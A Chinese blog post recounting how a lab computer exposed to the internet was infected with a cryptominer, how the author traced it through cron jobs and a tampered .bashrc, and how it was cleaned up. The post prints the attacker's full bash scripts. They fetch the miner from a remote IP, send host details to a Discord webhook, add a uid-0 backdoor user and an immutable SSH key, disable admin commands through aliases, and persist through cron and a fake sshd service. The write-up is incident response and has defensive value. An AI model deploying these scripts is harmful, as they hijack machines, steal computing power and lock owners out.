zoukankan      html  css  js  c++  java
  • 记一次 挖矿程序入侵和处理

    为了方便远程使用,师弟把实验室的电脑映射的公网上,结果被植入了挖矿程序

     挖矿软件是这个,因为已经被清理掉了,所以看不到运行了,不然的话,使用 nvidia-smi 命令可以看到这个挖矿程序在工作。

     然后进入到这个进程中, cd /proc/$PID , 查看它的信息

    首先查看所有文件,可以看到挖矿程序被放到这个位置

     通过  cat status  可以查看进程信息

     其中PPID标识了进程的父类信息,这里我是在复现,所以父进程是4168,原本父进程是 2

    然后把父进程杀死,把挖矿进程杀死,杀死挖矿程序。结果过一会挖矿程序又出现了,推测有定时执行任务,并且重启也不行。

    首先查看开机自启脚本是否正常

    vim /etc/rc.local

     这个文件是正常的,说明不是放到这的。

    然后检查root账户的  .bashrc 文件

    vim ~/.bashrc

     里面只有这么几行,这个明显是屏蔽掉了删除命令。切换到root账户,发现很多命令都被屏蔽掉了,那么肯定是出问题,但是这个文件又没有

    运行挖矿程序。考虑定时任务,查看是否设置了crontab

    ps -aux | grep crontab

    发现果然存在定时任务,然后查看一下定时任务

    crontab -e

    可以看到这几个奇怪的任务,这里我给注释掉了

    然后到 /var/tmp/.tmp/下看这几个文件

    #!/bin/bash
    m1lbe1()
    {
    if ! pgrep -x PhoenixMiner >/dev/null
    then
            cd /var/tmp/.tmp/PhoenixMiner
            ./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $*
    else
            exit;
    fi
    }
    m1lbe1
    .b4nd1d0
    #!/bin/bash
    ###Date###
    user="sclipicibosu"
    pass="saieilamuie"
    gilimea='"'
    ip=`/usr/bin/curl -s -connect-timeout 4 -m 4 ifconfig.me`
    rm -rf *timeout
    sshkey="ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAplmD9EFVf28OUB8tK/qJYG4ggMAw9PJzJU1AONgB5FV9w1hxxmP/+vVUfj7HgaTPB94IW4svaMe3vMTkmYm/0y9Zrh8Q2r6f/r1OqpwQU3ThLR6quOAtl7TW7y4VIQ/wxXOffINAIrEv7mi8D0XgpkiFwIUoblZY0ErPjBwy0WFqua2Z0qxx1bHoznDxPOsHMRxSge4DYA0gADttEWz8x1NZFcjMql8OOQ5IpZRsHxlO4cBVG37WyYpL7NYGF0gqnRRFSXBGduQph1dsEf3KFo83/QaSg+mm+EQiFrbVeqpm9tDjiFazbrwsw0YhT47yzKPi+Tews16sIHAvs5KZkw== sclipicibosu"
    nenea=`whoami`
    uptime=$(</proc/uptime)
    uptime=${uptime%%.*}
    zile=$(( uptime/60/60/24 ))
    secunde=$(( uptime%60 ))
    minute=$(( uptime/60%60 ))
    ore=$(( uptime/60/60%24 ))
    sended=$(date +'%m/%d/%Y')
    url='https://discord.com/api/webhooks/821345448212037685/UIO1CteG8cl6DerrO6fbI0ldKGk90H36NeNpXH56aYNbCBd1UZ31J89CR5ZBRSd9c3xj'
    ##########
    getingmineru(){
    locatie="$(cat /var/tmp/.ladyg0g0/.pr1nc35)"
    if [ -f $locatie/PhoenixMiner ]; then
        :
        else
        curl -s -L -O 45.32.112.68/.mini/PhoenixMiner.tar
        tar xvf PhoenixMiner.tar
        chmod 777 PhoenixMiner/*
    fi
    }
    ###
    locationperfection(){
    tinlex=$(pwd)
        mkdir /var/tmp/.ladyg0g0/ >/dev/null 2>&1
        echo $tinlex > "/var/tmp/.ladyg0g0/.pr1nc35"
        if [ $(id -u) = 0 ]; then
            if [ -f "/usr/bin/.locationesclipiciu" ]; then
                :
            else
                echo $tinlex > "/usr/bin/.locationesclipiciu"
            fi
        fi
    }
    ###
    showproof(){
    echo '
    {
      "content": null,
      "embeds": [
        {
          "title": "Miner ON: Ip: '$ip' | Pe User: '$nenea' ",
          "description": "**Cand s-a facut Install-ul:** ***'$sended'***
    
    **Other Info:** ***Version: 3.0*** **| Uptime Miner:** ***'$zile'*** **Zile**",
          "color": 16711680
        }
      ]
    }' > /tmp/.send.json
    /usr/bin/curl -H "Content-Type: application/json" --data @/tmp/.send.json $url
    }
    ###
    sshkiller(){
    if [ $(id -u) = 0 ]; then
    mkdir /usr/.SQL-Unix
    mkdir /usr/.SQL-Unix/.SQL
    echo "# .bashrc
    ############
    rm -rf ~/.bashrc
    rm -rf ~/.bash_history
    alias pkill='printf $gilimea$gilimea'
    alias kill='printf $gilimea$gilimea'
    alias killall='printf $gilimea$gilimea'
    alias init='printf $gilimea$gilimea'
    alias rm='printf $gilimea$gilimea'
    alias halt='printf $gilimea$gilimea'
    alias adduser='printf $gilimea$gilimea'
    alias userdel='printf $gilimea$gilimea'
    alias crontab='printf $gilimea$gilimea'
    alias htop='printf $gilimea$gilimea'
    alias find='printf $gilimea$gilimea'
    alias locate='printf $gilimea$gilimea'
    alias ps='printf $gilimea$gilimea'
    alias ss='printf $gilimea$gilimea'
    alias netstat='printf $gilimea$gilimea'
    ############
    echo '# .bashrc
                                                                                                                                                                           source /usr/.SQL-Unix/.SQL/.db
    alias rm='rm -i'
    alias cp='cp -i'
    alias mv='mv -i'
                                                                                                                                                                           echo Uname: $(uname -a)
    ' > ~/.bashrc
    " > /usr/.SQL-Unix/.SQL/.db
    echo "# .bashrc
                                                                                                                                                                           source /usr/.SQL-Unix/.SQL/.db
    alias rm='rm -i'
    alias cp='cp -i'
    alias mv='mv -i'
                                                                                                                                                                           echo Uname: $(uname -a)
    " > ~/.bashrc
    echo "
    if [ -f ~/.bashrc ]; then
        . ~/.bashrc
    fi
    
    " > ~/.bash_profile
    chattr -i /root/.ssh ; chattr -i /root/.ssh/authorized_keys
    echo $sshkey > "/root/.ssh/authorized_keys"
    chmod 600 /root/.ssh/authorized_keys
    chattr +i /root/.ssh/authorized_keys
    else
    mkdir /var/tmp/.SQL-Unix > /dev/null 2>&1
    mkdir /var/tmp/.SQL-Unix/.SQL > /dev/null 2>&1
    echo "# .bashrc
    ############
    rm -rf ~/.bashrc
    rm -rf ~/.bash_history
    alias pkill='printf $gilimea$gilimea'
    alias kill='printf $gilimea$gilimea'
    alias killall='printf $gilimea$gilimea'
    alias init='printf $gilimea$gilimea'
    alias rm='printf $gilimea$gilimea'
    alias halt='printf $gilimea$gilimea'
    alias adduser='printf $gilimea$gilimea'
    alias userdel='printf $gilimea$gilimea'
    alias crontab='printf $gilimea$gilimea'
    alias htop='printf $gilimea$gilimea'
    alias find='printf $gilimea$gilimea'
    alias locate='printf $gilimea$gilimea'
    alias ps='printf $gilimea$gilimea'
    alias ss='printf $gilimea$gilimea'
    alias netstat='printf $gilimea$gilimea'
    ############
    echo '# .bashrc
                                                                                                                                                                           source /var/tmp/.SQL-Unix/.SQL/.db
    alias rm='rm -i'
    alias cp='cp -i'
    alias mv='mv -i'
                                                                                                                                                                           echo Uname: $(uname -a)
    ' > ~/.bashrc
    " > /var/tmp/.SQL-Unix/.SQL/.db
    echo "# .bashrc
                                                                                                                                                                           source /var/tmp/.SQL-Unix/.SQL/.db
    alias rm='rm -i'
    alias cp='cp -i'
    alias mv='mv -i'
                                                                                                                                                                           echo Uname: $(uname -a)
    " > ~/.bashrc
    echo "
    if [ -f ~/.bashrc ]; then
        . ~/.bashrc
    fi
    
    " > ~/.bash_profile
    fi
    }
    ###
    facuser(){
    if [ $(id -u) = 0 ]; then
       if ! cat /etc/passwd | grep -q "${user}"; then
       /usr/sbin/useradd -u0 -g0 -o -s /bin/bash $user ; usermod -aG sudo $user
       yes "$pass" | passwd $user
       else
            :
       fi
    fi
    }
    ###
    minerinio(){
    locatie="$(pwd)"
    if [ -f $locatie/.b4nd1d0 ]
    then
    locatie="$(pwd)"
    echo '#!/bin/bash
    m1lbe1()
    {
    if ! pgrep -x PhoenixMiner >/dev/null
    then
            cd '$locatie'/PhoenixMiner
            ./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $*
    else
            exit;
    fi
    }
    m1lbe1' > $locatie/.b4nd1d0
        chmod 777 $locatie/.b4nd1d0
        $locatie/./.b4nd1d0
        else
        locatie="$(pwd)"
    echo '#!/bin/bash
    m1lbe1()
    {
    if ! pgrep -x PhoenixMiner >/dev/null
    then
            cd '$locatie'/PhoenixMiner
            ./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $*
    else
            exit;
    fi
    }
    m1lbe1' > $locatie/.b4nd1d0
    chmod 777 $locatie/.b4nd1d0
    $locatie/./.b4nd1d0
    fi
    }
    ###
    crontablegend() {  
    locatie="$(pwd)"
    if ! crontab -l | grep -q '.placi'; then
       rm -rf $locatie/.5p4rk3l5
       echo "@daily "$locatie"/./.b4nd1d0" >> $locatie/.5p4rk3l5
       sleep 1
       echo "@reboot "$locatie"/./.placi > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5
       sleep 1
       echo "* * * * * "$locatie"/./.placi > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5
       sleep 1
       echo "@monthly "$locatie"/./.placi  > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5
       sleep 1
       crontab $locatie/.5p4rk3l5
       sleep 1
       source ~/.bashrc
       rm -rf $locatie/.5p4rk3l5
    fi
    }
    ###
    locationperfection
    sleep 0.5
    echo "Locatie ON"
    wait
    getingmineru
    sleep 0.5
    echo "Minerul Luat"
    wait
    facuser
    sleep 0.5
    echo "User Facut"
    wait
    sshkiller
    sleep 0.5
    echo "SSH Mort"
    wait
    showproof
    sleep 0.5
    echo "Info Trimis"
    wait
    crontablegend
    sleep 0.5
    echo "Crontab Done"
    wait
    minerinio
    sleep 0.5
    echo "Minerul Pornit"
    wait
    ###
    checkingpid(){
        if [ -f /usr/bin/.pidsclip ]; then
            if ps -p $(cat /usr/bin/.pidsclip) > /dev/null; then
                echo "Already running..."
            else 
                /usr/bin/sshd > /dev/null 2>&1 & disown
                echo $! > /usr/bin/.pidsclip
                chmod 777 /usr/bin/.pidsclip
                echo "Done"
            fi
        else
            /usr/bin/sshd > /dev/null 2>&1 & disown
            echo $! > /usr/bin/.pidsclip
            chmod 777 /usr/bin/.pidsclip
            echo "Done"
            fi
    }
    ###
    killingstrangers(){
    echo '
    #!/bin/bash
    locatieasdf=$(cat /usr/bin/.locationesclipiciu)
    if [ ! -d '$locatieasdf' ]; then
        mkdir '$locatieasdf'
        rsync -r /usr/bin/.locationesclipiciu/ '$locatieasdf'/
        sleep 1
        '$locatieasdf'/.b4nd1d0 > /dev/null 2>&1 & disown
    else
        if [ ! -f  '$locatieasdf'/PhoenixMiner ]; then
            rsync -r /usr/bin/.locationesclipiciu/ '$locatieasdf'/
            sleep 1
            '$locatieasdf'/.b4nd1d0 > /dev/null 2>&1 & disown
    fi' > /usr/bin/sshd
    sleep 1
    chmod 777 /usr/bin/sshd
    }
    ###
    pisamsystemu(){
    echo '[Unit]
    Description=Example systemd service.
    [Service]
    Type=simple
    Restart=always
    RestartSec=3600
    ExecStart=/bin/bash /usr/bin/sshd
    [Install]
    WantedBy=multi-user.target' > /lib/systemd/system/myservice.service
    sleep 1
    chmod 644 /lib/systemd/system/myservice.service
    systemctl enable myservice
    systemctl start myservice
    
    if [ -f "/var/tmp/.ladyg0g0/.pr1nc35" ]; then
        echo "Locatia este deja setata"
    else
        if [ -f "/usr/bin/.locationesclipiciu" ]; then
            locationperfection
            echo "Am-rupt-locatiile-alea"
    sleep 1
        fi
    fi
    if [ ! -f "/var/tmp/.ladyg0g0/.pr1nc35" ]; then
        if [ -d "/var/tmp/.ladyg0g0" ]; then
            locationperfection
            locationperfection
            echo "Locatia a fost setata"
        else
            echo "Acum facem folderul"
            mkdir /var/tmp/.ladyg0g0/
            locationperfection
            locationperfection
            echo "Am setat locatia"
        fi
    fi
    if [ -f $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip ]; then
        if ps -p $(cat $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip) > /dev/null; then
            echo "Already running..."
        else 
            $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.placi > /dev/null 2>&1 & disown
            echo $! > $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
            chmod 777 $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
            echo "Done"
            fi
    else
        $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.placi > /dev/null 2>&1 & disown
        echo $! > $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
        chmod 777 $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
        echo "Done"
    fi
    }
    ###
    if [ $(id -u) = 0 ]; then
        if [ ! -d /usr/bin/.locationesclipiciu ]; then
        cp -avr $(cat /var/tmp/.ladyg0g0/.pr1nc35) /usr/bin/.locationesclipiciu >/dev/null 2>&1 & disown
        bash -c 'yum install -y rsync >/dev/null 2>&1 & disown' || bash -c 'apt install -y rsync >/dev/null 2>&1 & disown'
            if [ ! -f /usr/bin/sshd ]; then
                killingstrangers
                pisamsystemu
                checkingpid
            fi
        fi
    fi
    ###
    .placi

    可以看到这个人果然是在这里做了些操作,然后它把.bashrc文件重写,这也是我们之前查看没有直接发现问题的原因。其实如果它把.bashrc先备份一下,

    然后执行完病毒再恢复,这样会更隐蔽。可能是个新手叭(虽然我找这个病毒也是找了好久。。)

    至此,挖矿病毒就被清理掉了,吓的我也是赶紧把内网映射关掉了。果然有的人为了钱,啥事都能干。。

  • 相关阅读:
    XML指南——XML 瀏覽器(Netscape、Explorer)
    XML指南——察看 XML 文件
    ASP中Dictionary的使用
    SQL Mobile的RDA数据同步开发
    XML指南——XML 確認
    简单的js分页脚本
    浏览器语种检测,适合于多语言版本的站点
    Com/Dcom/Com+的思考
    XML指南——XML數據島
    MOSS 2007 功能概述
  • 原文地址:https://www.cnblogs.com/superxuezhazha/p/14822482.html
Copyright © 2011-2022 走看看